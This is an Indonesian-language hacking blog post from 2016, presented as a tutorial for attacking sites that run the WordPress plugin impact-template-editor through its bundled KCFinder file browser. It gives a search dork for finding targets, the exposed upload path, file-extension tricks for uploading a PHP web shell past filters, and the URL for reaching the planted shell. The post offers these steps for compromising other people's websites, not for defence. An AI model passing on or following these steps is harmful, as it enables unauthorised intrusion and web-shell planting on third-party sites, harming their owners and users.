Selasa, 15 Maret 2016

Wordpress Plugins impact-template-editor Vulnerability

Assalamualaikum :D

Sekarang Saya Akan Membagikan Tutorial Wordpress Plugins impact-template-editor Vulnerability

Yups, Plugins ini punya bug!  di plugins ini dia include KCFinder  Tau lah kan KCFinder gmana .  Yuk 


Langsung Aja!





Default Dork :/wp-content/plugins/impact-template-editor/   ( Kembangin Lagi yah biar dapat banyak )

Exploit : /wp-content/plugins/impact-template-editor/lib/kcfinder/browse.php


Kalau Udah Di Dapat , Tinggal Upload Shell Kalian , Tpi Harus Berextensi  php2 , php.asp , php4 ,

php.ndsxf

Akses Shellnya :  http://[target]/upload/impact/shellkamu.php 

Ok Sekian Dulu Yah

Wassalamualaikum. Wr. Wb.

Author : Putra Attacker | ./MR.INTERCEPTION

Facebook : https://www.facebook.com/marselERROR

Fanspage : https://www.facebook.com/Ghosts.phtml

Forum : http://phantom-ghost.org